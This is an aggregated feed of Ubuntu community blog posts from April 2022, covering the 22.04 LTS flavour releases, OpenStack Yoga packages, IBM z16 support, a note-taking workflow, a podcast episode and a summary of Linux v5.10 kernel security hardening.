This episode and the image used are licensed under [Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)](https://creativecommons.org/licenses/by-nc-nd/4.0/), [whose full text can be read here](https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode). We are open to licensing for other types of use; [contact us](https://podcastubuntuportugal.org/contactos) for validation and authorization.

on April 21, 2022 10:03 PM

Kubuntu 22.04 LTS Released

Kubuntu General News

The Kubuntu Team is happy to announce that Kubuntu 22.04 LTS has been released, featuring the beautiful KDE Plasma 5.24 LTS: simple by default, powerful when needed.

Codenamed “Jammy Jellyfish”, Kubuntu 22.04 continues our tradition of giving you Friendly Computing by integrating the latest and greatest Free Software technologies into a high-quality, easy-to-use Linux distribution.

The team has been hard at work through this cycle, introducing new features and fixing bugs.

Under the hood, there have been updates to many core packages, including a new 5.15-based kernel, KDE Frameworks 5.92, Plasma 5.24 LTS and KDE Gear (formerly Applications) 21.12.3.

Kubuntu has seen many updates for other applications, both in our default install, and installable from the Ubuntu archive.

Elisa, KDE Connect, Krita, KDevelop, digiKam, Latte Dock, and many, many more applications have been updated.

Applications that are key for day-to-day usage are included and updated, such as Firefox, VLC and LibreOffice.

For this release we provide Thunderbird for email support; however, the KDE PIM suite (including Kontact and KMail) is still available to install from the archive.

For a list of other application updates, upgrading notes and known bugs be sure to read our release notes.

Download 22.04 LTS or read how to upgrade from 21.10 and 20.04.

Note: From 21.10, there may be a delay of a few hours to a few days between the official release announcement and the Ubuntu Release Team enabling upgrades. From 20.04, upgrades will not be enabled until approximately the date of the first 22.04 point release (22.04.1) at the end of July.

on April 21, 2022 06:24 PM

The Ubuntu OpenStack team at Canonical is pleased to announce the general
availability of OpenStack Yoga on Ubuntu 22.04 LTS (Jammy Jellyfish) and
Ubuntu 20.04 LTS (Focal Fossa) via the Ubuntu Cloud Archive. Details of
the Yoga release can be found at: https://www.openstack.org/software/yoga

To get access to the Ubuntu Yoga packages:

Ubuntu 22.04 LTS

OpenStack Yoga is available by default on Ubuntu 22.04.

Ubuntu 20.04 LTS

The Ubuntu Cloud Archive for OpenStack Yoga can be enabled on Ubuntu
20.04 by running the following command:

sudo add-apt-repository cloud-archive:yoga
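
After enabling the archive, refresh the package index; candidates for OpenStack packages should then come from the Yoga pocket (a quick sanity check, with nova-common as an example package):

sudo apt update
apt policy nova-common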

The Ubuntu Cloud Archive for Yoga includes updates for:

aodh, barbican, ceilometer, ceph (17.1.0), cinder, designate,
designate-dashboard, dpdk (21.11), glance, gnocchi, heat,
heat-dashboard, horizon, ironic, ironic-ui, keystone, libvirt (8.0.0),
magnum, magnum-ui, manila, manila-ui, masakari, mistral, murano,
murano-dashboard, networking-arista, networking-bagpipe,
networking-baremetal, networking-bgpvpn, networking-hyperv,
networking-l2gw, networking-mlnx, networking-odl, networking-sfc,
neutron, neutron-dynamic-routing, neutron-fwaas, neutron-vpnaas, nova,
octavia, octavia-dashboard, openstack-trove, openvswitch (2.17.0),
ovn (22.03.0), ovn-octavia-provider, placement, sahara,
sahara-dashboard, senlin, swift, trove-dashboard, vmware-nsx,
vitrage, watcher, watcher-dashboard, zaqar, and zaqar-ui.

For a full list of packages and versions, please refer to:

Reporting bugs

If you have any issues please report bugs using the ‘ubuntu-bug’ tool to
ensure that bugs get logged in the right place in Launchpad:

sudo ubuntu-bug nova-conductor

Thank you to everyone who contributed to OpenStack Yoga!

(on behalf of the Ubuntu OpenStack Engineering team)

on April 21, 2022 06:03 PM

A jellyfish and a mainframe

Elizabeth K. Joseph

Happy Ubuntu 22.04 LTS (Jammy Jellyfish) release day!

April has been an exciting month. On April 5th, the IBM z16 was released. For those of you who aren’t aware, this is the IBM zSystems class of mainframes that I’ve been working on at IBM for the past three years. As a Developer Advocate, I’ve been able to spend a lot of time digging into the internals, learning about the implementation of DevOps practices and incorporation of Linux into environments, and so much more. I’ve also had the opportunity to work with dozens of open source projects in the Linux world as they get their software to run on the s390x architecture. This includes working with several Linux distributions, and most recently forming the Open Mainframe Project Linux Distributions Working Group with openSUSE’s Sarah Julia Kriesch.

As a result, I’m delighted to continue to spend a little time with Ubuntu!

For the Ubuntu 22.04 release, the team at Canonical has already been working hard to incorporate key features of the IBM z16, which Frank Heimes has covered in technical detail on the Ubuntu on Big Iron blog in IBM z16 launches with Ubuntu 22.04 (beta) support, and also over on Ubuntu.com with IBM z16 is here, and Ubuntu 22.04 LTS beta is ready. Finally, Frank published: Ubuntu 22.04 LTS got released

Indeed, timing was fortuitous, as Frank notes:

“Since the development of the new IBM z16 happened in parallel with the development of the upcoming Ubuntu Server release, Canonical was able to ensure that Ubuntu Server 22.04 LTS (beta) already includes support for new IBM z16 capabilities.

And this is not limited to the support for the core system, but also includes its peripherals and special facilities”

Now that it’s release day, I wanted to celebrate with the community by sharing a few details of the IBM z16 and some highlights from those blog posts.

So first – the IBM z16 is so pretty! It comes in one to four frames, depending on the needs of the client. In its maximum configuration it has up to 200 Processor Units featuring 5.2 GHz IBM Telum processors, 40 TB of memory, and 85 LPARs.

As for how Ubuntu was able to leverage improvements to 22.04 to take advantage of everything from the AI Accelerator on the IBM Telum processor to new Quantum-Safe technologies, Frank goes on to share:

“Since we constantly improve Ubuntu, 22.04 was updated and modified for IBM z16 and other platforms in the following areas:

  • virtually the entire cryptography stack was updated, due to the switch to openssl 3
  • some Quantum-safe options are available: library for quantum-safe cryptographic algorithms (liboqs), post-quantum encryption and signing tool (codecrypt), implementation of public-key encryption scheme NTRUEncrypt (libntru)
  • Secure Execution got refined and the virtualization stack updated
  • the chacha20 in-kernel stream cipher (RFC 7539) was hardware optimized using SIMD
  • the kernel zcrypt device driver is now able to exploit the new IBM zSystems crypto hardware, especially Crypto Express8S (CEX8S)
  • and finally a brand new protected key crypto library package (libzpc) was added”

This is a really interesting time to be a Linux distribution in this ecosystem. Beyond these fantastic strides made with Ubuntu, the collaboration that’s already taking place across distributions in our new Working Group has been exciting to watch.

Keep up the good work, everyone! And Ubuntu friends, pause a bit today to celebrate, you’ve earned it.

Jellyfish earrings!

Side note: I haven’t mentioned the IBM LinuxONE. As some background, the IBM z16 can have Integrated Facility for Linux (IFL) processors, so you can already run Linux on this generation of mainframes! But the LinuxONE product line only has IFLs, meaning they exclusively run Linux. As a separate product, it can have different release dates, and the current timeline that’s been published is “second half of 2022” for the announcement of the next LinuxONE. Stay tuned, and know that everything I’ve shared about Ubuntu 22.04 for the IBM z16 will also be true of the next LinuxONE.

on April 21, 2022 05:39 PM

The Ubuntu Studio team is pleased to announce the release of Ubuntu Studio 22.04, code-named “Jammy Jellyfish”. This marks Ubuntu Studio’s 31st release. This release is a Long-Term Support release and as such, it is supported for 3 years (until April 2025).

Since it’s just out, you may experience some issues, so you might want to wait a bit before upgrading. Please see the release notes for a complete list of changes and known issues.

You can download Ubuntu Studio 22.04 LTS from our download page.



Due to the change in desktop environment that started after the release of 20.04 LTS, direct upgrades from 20.04 LTS are not supported and may only be attempted at your own risk. As with any system-critical operation, back up your data before attempting any upgrade. The safest upgrade path is a backup of your /home directory and a clean install.

We have had anecdotal reports of successful upgrades from 20.04 LTS (Xfce desktop) to later releases (Plasma desktop), but this will remain at your own risk, and it is highly recommended to wait until 22.04.1 is released in August before attempting such an upgrade.

Instructions for upgrading are included in the release notes.

New This Release

Most of this release is evolutionary on top of 21.10 rather than revolutionary. As such, most of the applications contained are simply upgraded versions. Details on key packages can be found in the release notes.

Dark Theme By Default

For this release, we have a neutral-toned dark theme by default. We could have gone with the Breeze Dark color scheme once we dropped the Materia KDE widget and window theme (it was difficult to maintain and to make work with new Plasma features), but instead we decided to develop our own, based on GNOME’s Adwaita Dark theme, with a corresponding Light theme. This helps with photography: a neutral tone is necessary because Breeze Dark has a more blueish hue, which can trick the eye into seeing photos as warmer than they actually are.

However, switching from the dark theme to the light theme is a breeze (pun somewhat intended). When opening the System Settings, one only has to look at the home screen to see how to do that.

Support for rEFInd

rEFInd is a bootloader for UEFI-based systems. Our lowlatency kernel settings create a menu entry that applies those settings and keeps the lowlatency kernel as the default kernel detected by rEFInd. To keep it current, simply run sudo dpkg-reconfigure ubuntustudio-lowlatency-settings in the command line after a kernel update.

For a more complete list of changes, please see the release notes.

Backports PPA

System Settings with Accent Colors (Folder Colors will follow if Backports PPA is added)

There are a few items planned for the Backports PPA once the next release cycle opens. One of those is folder icons that match the accent color set in the System Settings.

We plan on keeping the backports PPA up-to-date for the next two years until the release of 24.04 LTS, at which point you will be encouraged to update.

Instructions for enabling the Ubuntu Studio Backports PPA

  • Automatic method:
    • Open Ubuntu Studio Installer
    • Click “Enable Backports”
  • Manual method:
    • sudo add-apt-repository ppa:ubuntustudio-ppa/backports
    • sudo apt upgrade

Note that at release time, there’s nothing in there yet, so if you add it now (at the time of this writing) you’ll get a 404 (file not found) error.

On a related note, at this time, the Backports PPA is frozen for 21.10 and 20.04 LTS. To receive newer versions of software, you must upgrade.

Plasma Backports

Since we share the Desktop Environment with Kubuntu, simply adding the Kubuntu Backports will help you with keeping the desktop environment and its components up-to-date with the latest versions:

  • sudo add-apt-repository ppa:kubuntu-ppa/backports
  • sudo apt upgrade

More Updates

There are many more updates not covered here but are mentioned in the Release Notes. We highly recommend reading those release notes so you know what has been updated and know any known issues that you may encounter.

Get Involved!

A great way to contribute is to get involved with the project directly! We’re always looking for new volunteers to help with packaging, documentation, tutorials, user support, and MORE! Check out all the ways you can contribute!

Special Thanks

Huge special thanks for this release go to:

  • Len Ovens: Studio Controls, Ubuntu Studio Installer, Coding
  • Thomas Ward: Packaging, Ubuntu Core Developer for Ubuntu Studio
  • Eylul Dogruel: Artwork, Graphics Design, Website Lead
  • Ross Gammon: Upstream Debian Developer, Guidance, Testing
  • Sebastien Ramacher: Upstream Debian Developer
  • Dennis Braun: Debian Package Maintainer
  • Rik Mills: Kubuntu Council Member, help with Plasma desktop
  • Mauro Gaspari: Tutorials, Promotion, and Documentation, Testing
  • Brian Hechinger: Testing and bug reporting
  • Chris Erswell: Testing and bug reporting
  • Robert Van Den Berg: Testing and bug reporting, IRC Support
  • Krytarik Raido: IRC Moderator, Mailing List Moderator
  • Erich Eickmeyer: Project Leader, Packaging, Direction, Treasurer
on April 21, 2022 05:10 PM

April 18, 2022

A while ago, in the Developers Ve en el mundo group, I asked whether anyone had used Obsidian. Considering myself an Evernote power user, I know what I need, and in the years I have spent looking for an alternative that works on Linux, the problem has been that very few really work well, or even have Linux support at all.

I decided to go with Obsidian, after considering Notion and other tools, mainly because of the plugins and because it has Zettelkasten as a feature. The decision also rested on the following other reasons:

  • It is perfect for Zettelkasten and for building a second brain (Building a Second Brain), and it has a simple but powerful tag system.
  • Markdown support by default.
  • The files are on my devices, not in the cloud, by design.
  • I can choose my own backup, version control and redundancy alternatives.
  • Support for Kanban Boards.
  • Support for Day Planners.
  • Support for Natural Language Dates for things like: @today, @tomorrow.
  • The interface is exactly what I love about Sublime, which is what I had been using for note-taking, together with the phone’s notes app and notes via email.
  • It has a VIM mode :D.
  • The roadmap looks promising.


After reviewing several things, and doing a bit of real research, I arrived at the following workflow:

  • I managed to build a workflow that does what I need:
    • Vault in git on my VPS, in my own gitea instance; the data is mine.
    • On Linux:
      • The different Vaults would be managed via git directly.
        • Nextcloud as a redundant backup mechanism on the NAS at home, via scsi on an rpi.
        • In the medium to long term:
          • The NAS solution could be FreeNAS, TrueNAS or Synology
          • VPS as a gateway, using a VPN with wireguard to keep everything on a private network.
    • On OSX:
      • Same as on Linux, via git, but with the difference that the vaults would live in a folder in iCloud.
      • The ssh key with write access to the repo would be imported into the keystore (ssh-add -K), so it doesn’t cause trouble by asking for passwords.
      • Still pending: working out how to sign commits with GPG, or maybe using ssh to sign commits
    • On iOS, the vaults would be opened via iCloud, leaving git handling aside until ios/mobile support lands in obsidian-git.


In a while I will revisit this post and will most likely update it with my new workflow… or do a retrospective on what could have gone better, etc. However, I think the first task I will take on will be writing a plugin to integrate it with the creation of posts for this blog, and to make use of the tag graph, which for now… looks like this:

tag cloud

on April 18, 2022 12:00 AM

April 16, 2022

To celebrate the new release of the popular free and open source GNU/Linux distribution Ubuntu 22.04, we are going to hold a release party. The event will take place on the 1st of May. Due to continued COVID uncertainties, the event will be held in a live virtual format with moderated Q&A.  The Call for […]
on April 16, 2022 04:40 AM

April 14, 2022

Ep 190 – Societal

Podcast Ubuntu Portugal

Miguel is depressed! He has just found out that in a few years (5, maybe 10) he will have to spend money on a new phone. Carrondo is delighted with his new, libre alarm system. Constantino has been chatting on Twitter, for a change… this week it was about Firefox extensions. But the main course of this meal was the European Commission’s relationship with Free Software!

You know the drill: listen, subscribe and share!

  • https://www.wired.co.uk/article/europe-police-facial-recognition-prum
  • https://www.dn.pt/dinheiro/altice-nos-e-vodafone-admitem-desligar-rede-3g-mas-ainda-nao-ha-calendario-14760509.html
  • https://github.com/popey/unsnap
  • https://www.home-assistant.io/integrations/alarm_control_panel/
  • https://addons.mozilla.org/pt-PT/firefox/user/12818933/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=addons-manager-user-profile-link
  • https://web.archive.org/web/20220405115850/https://addons.mozilla.org/pt-PT/firefox/user/12818933/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=addons-manager-user-profile-link
  • https://ec.europa.eu/info/departments/informatics/open-source-software-strategy_en
  • https://joinup.ec.europa.eu/collection/fosseps/news/fosseps-pilot
  • https://joinup.ec.europa.eu/collection/fosseps/news/help-identify-critical-open-source-software
  • https://joinup.ec.europa.eu/collection/ec-ospo/news/nextgov-hackathon
  • https://nextgov-hackathon.eu/tnc/
  • https://twitter.com/EU_DIGIT/status/1484111357893091333
  • https://twitter.com/EU_DIGIT/status/1503728797136433154
  • https://shop.nitrokey.com/shop/product/nk-pro-2-nitrokey-pro-2-3?aff_ref=3
  • https://shop.nitrokey.com/shop?aff_ref=3
  • https://youtube.com/PodcastUbuntuPortugal


You can support the podcast using the Humble Bundle affiliate links; when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal.
You can get all of this for 15 dollars, or different parts of it depending on whether you pay 1 or 8.
We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you like.

If you are interested in other bundles not listed in the show notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

Attribution and licenses

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Alexandre Carrapiço, “Senhor Podcast”.

The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the [CC0 1.0 Universal License](https://creativecommons.org/publicdomain/zero/1.0/).

This episode and the image used are licensed under Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), whose full text can be read here. We are open to licensing for other types of use; contact us for validation and authorization.

on April 14, 2022 07:45 PM

April 07, 2022

I regularly fly between Belgium and my second home country, Latvia. How much am I sponsoring Vladimir when doing that? About 25€. A back-of-the-envelope calculation:

  • CRL - RIX return = 330 kg CO2 (source)
  • 1 l jet fuel a1 = 2.52 kg CO2 (source)
  • 1 l jet fuel = 0.85€ (source, some currency and SI conversion required)
  • refinery and distribution margin ~ 15% (conservative ballpark guesstimate based upon price/barrel for crude and jet a1 fuel)
  • percentage of Russian crude in EU: 27% (source)
  • (330/2.52)*.85*.85*.27 = 25.55€

P.S. More source countries have "interesting" policies. For example, 8% of EU imports are from Saudi Arabia.

P.P.S. Our upcoming holiday will be by night train. Exciting!

on April 07, 2022 03:21 PM

April 05, 2022

To celebrate the new release of the popular free and open source GNU/Linux distribution, Ubuntu 22.04, we are going to hold a release party. The event will take place on the 1st of May. Due to continued COVID uncertainties, the event will be held in a live virtual format with moderated Q&A.  The Call for […]
on April 05, 2022 09:41 AM

Previously: v5.9

Linux v5.10 was released in December, 2020. Here’s my summary of various security things that I found interesting:

AMD SEV-ES
While guest VM memory encryption with AMD SEV has been supported for a while, Joerg Roedel, Thomas Lendacky, and others added register state encryption (SEV-ES). This means it’s even harder for a VM host to reconstruct a guest VM’s state.

x86 static calls
Josh Poimboeuf and Peter Zijlstra implemented static calls for x86, which operates very similarly to the “static branch” infrastructure in the kernel. With static branches, an if/else choice can be hard-coded, instead of being run-time evaluated every time. Such branches can be updated too (the kernel just rewrites the code to switch around the “branch”). All these principles apply to static calls as well, but they’re for replacing indirect function calls (i.e. a call through a function pointer) with a direct call (i.e. a hard-coded call address). This eliminates the need for Spectre mitigations (e.g. RETPOLINE) for these indirect calls, and avoids a memory lookup for the pointer. For hot-path code (like the scheduler), this has a measurable performance impact. It also serves as a kind of Control Flow Integrity implementation: an indirect call got removed, and the potential destinations have been explicitly identified at compile-time.
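
As a rough illustration, here is a minimal sketch of the static call macros from include/linux/static_call.h (DEFINE_STATIC_CALL, static_call, static_call_update); the handler names are hypothetical:

#include <linux/static_call.h>

static int handler_a(int arg) { return arg + 1; }   /* hypothetical */
static int handler_b(int arg) { return arg * 2; }   /* hypothetical */

/* Defines the call site, initially targeting handler_a. */
DEFINE_STATIC_CALL(my_hook, handler_a);

int run_hook(int arg)
{
	/* Emitted as a direct call: no function-pointer load, no retpoline. */
	return static_call(my_hook)(arg);
}

void retarget_hook(void)
{
	/* Rewrites the call instruction in place to target handler_b. */
	static_call_update(my_hook, handler_b);
}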

network RNG improvements
In an effort to improve the pseudo-random number generator used by the network subsystem (for things like port numbers and packet sequence numbers), Linux’s home-grown pRNG has been replaced by the SipHash round function, and perturbed by (hopefully) hard-to-predict internal kernel states. This should make it very hard to brute force the internal state of the pRNG and make predictions about future random numbers just from examining network traffic. Similarly, ICMP’s global rate limiter was adjusted to avoid leaking details of network state, as a start to fixing recent DNS Cache Poisoning attacks.

SafeSetID handles GID
Thomas Cedeno improved the SafeSetID LSM to handle group IDs (which required teaching the kernel about which syscalls were actually performing setgid.) Like the earlier setuid policy, this lets the system owner define an explicit list of allowed group ID transitions under CAP_SETGID (instead of to just any group), providing a way to keep the power of granting this capability much more limited. (This isn’t complete yet, though, since handling setgroups() is still needed.)
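
For flavor, configuring such a policy looks roughly like the sketch below, assuming CONFIG_SECURITY_SAFESETID and securityfs mounted at /sys/kernel/security; the UID/GID pairs are examples, and the exact file names should be checked against Documentation/admin-guide/LSM/SafeSetID.rst:

# allow transitions from UID/GID 1000 to 1001 under CAP_SETUID/CAP_SETGID
echo "1000:1001" > /sys/kernel/security/safesetid/uid_allowlist_policy
echo "1000:1001" > /sys/kernel/security/safesetid/gid_allowlist_policy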

improve kernel’s internal checking of file contents
The kernel provides LSMs (like the Integrity subsystem) with details about files as they’re loaded. (For example, loading modules, new kernel images for kexec, and firmware.) There wasn’t very good coverage for cases where the contents were coming from things that weren’t files. To deal with this, new hooks were added that allow the LSMs to introspect the contents directly, and to do partial reads. This will give the LSMs much finer grain visibility into these kinds of operations.

set_fs removal continues
With the earlier work landed to free the core kernel code from set_fs(), Christoph Hellwig made it possible for set_fs() to be optional for an architecture. He subsequently removed set_fs() entirely for x86, riscv, and powerpc. These architectures will now be free from the entire class of “kernel address limit” attacks that only needed to corrupt a single value in struct thread_info.

sysfs_emit() replaces sprintf() in /sys
Joe Perches tackled one of the most common bug classes with sprintf() and snprintf() in /sys handlers by creating a new helper, sysfs_emit(). This will handle the cases where kernel code was not correctly dealing with the length results from sprintf() calls, which might lead to buffer overflows in the PAGE_SIZE buffer that /sys handlers operate on. With the helper in place, it was possible to start the refactoring of the many sprintf() callers.
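
The conversion is mechanical; a hedged sketch of a device attribute handler, with foo_value as a stand-in (assumes <linux/device.h> and <linux/sysfs.h>):

static int foo_value;   /* hypothetical state exposed via /sys */

static ssize_t foo_show(struct device *dev,
			struct device_attribute *attr, char *buf)
{
	/* Was: return sprintf(buf, "%d\n", foo_value);
	 * sysfs_emit() knows buf is a PAGE_SIZE sysfs buffer and
	 * refuses to write past its end. */
	return sysfs_emit(buf, "%d\n", foo_value);
}
static DEVICE_ATTR_RO(foo);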

nosymfollow mount option
Mattias Nissler and Ross Zwisler implemented the nosymfollow mount option. This entirely disables symlink resolution for the given filesystem, similar to other mount options where noexec disallows execve(), nosuid disallows setid bits, and nodev disallows device files. Quoting the patch, it is “useful as a defensive measure for systems that need to deal with untrusted file systems in privileged contexts.” (i.e. for when /proc/sys/fs/protected_symlinks isn’t a big enough hammer.) Chrome OS uses this option for its stateful filesystem, as symlink traversal has been a common attack-persistence vector.
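
Used from the command line it looks something like this sketch (device and mountpoint are examples, and mount(8) needs to be new enough to know the option); note that creating symlinks is still allowed, only following them is blocked:

sudo mount -o nosymfollow /dev/sdb1 /mnt/untrusted
ln -s /etc/passwd /mnt/untrusted/link   # creating the symlink succeeds
cat /mnt/untrusted/link                 # following it now fails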

ARMv8.5 Memory Tagging Extension support
Vincenzo Frascino added support to arm64 for the coming Memory Tagging Extension, which will be available for ARMv8.5 and later chips. It provides 4 bits of tags (covering multiples of 16 byte spans of the address space). This is enough to deterministically eliminate all linear heap buffer overflow flaws (1 tag for “free”, and then rotate even values and odd values for neighboring allocations), which is probably one of the most common bugs being currently exploited. It also makes use-after-free and over/under indexing much more difficult for attackers (but still possible if the target’s tag bits can be exposed). Maybe some day we can switch to 128 bit virtual memory addresses and have fully versioned allocations. But for now, 16 tag values is better than none, though we do still need to wait for anyone to actually be shipping ARMv8.5 hardware.

fixes for flaws found by UBSAN
The work to make UBSAN generally usable under syzkaller continues to bear fruit, with various fixes all over the kernel for stuff like shift-out-of-bounds, divide-by-zero, and integer overflow. Seeing these kinds of patches land reinforces the rationale of shifting the burden of these kinds of checks to the toolchain: these run-time bugs continue to pop up.
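
As a trivial userspace analogue of the first of those bug classes, compile the following with -fsanitize=undefined under gcc or clang and the run-time check fires:

int main(void)
{
	int x = 1;
	int shift = 40;    /* wider than int: shift-out-of-bounds */
	return x << shift; /* UBSAN reports this at run time */
}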

flexible array conversions
The work on flexible array conversions continues. Gustavo A. R. Silva and others continued to grind on the conversions, getting the kernel ever closer to being able to enable the -Warray-bounds compiler flag and clear the path for saner bounds checking of array indexes and memcpy() usage.
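
A typical conversion, sketched with a hypothetical struct (struct_size() comes from include/linux/overflow.h; assumes <linux/slab.h> and <linux/types.h>):

struct report {
	size_t len;
	u8 data[];	/* was "u8 data[1];", a fake fixed bound that hid overflows */
};

static struct report *report_alloc(size_t len)
{
	/* Overflow-checked sizing; the compiler can now reason about the
	 * real bounds of "data" for -Warray-bounds and memcpy() checking. */
	struct report *r = kmalloc(struct_size(r, data, len), GFP_KERNEL);

	if (r)
		r->len = len;
	return r;
}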

That’s it for now! Please let me know if you think anything else needs some attention. Next up is Linux v5.11.

© 2022, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

on April 05, 2022 12:01 AM